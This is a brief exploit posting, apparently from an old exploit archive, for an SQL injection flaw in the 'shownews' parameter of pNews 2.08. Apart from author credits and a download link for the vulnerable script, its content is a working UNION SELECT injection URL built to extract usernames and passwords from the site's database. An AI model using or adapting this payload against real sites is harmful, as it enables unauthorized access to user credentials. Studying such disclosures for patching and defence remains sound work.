pNews 2.08 - 'shownews' SQL Injection
pNews 2.08 Remote SqL Ä°nj. VuLn.
OrginaL : http://biyosecurity.com & http://coderx.org
Cr@zy_King / sqL L0v3r'Z Crew Co. 2008
Script Down ; http://www.powie.de/cms/filedb/file.php?id=115&filecat=&eintrag=
http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table/*
Greatz : aLL My Friends :P
# milw0rm.com [2008-06-09]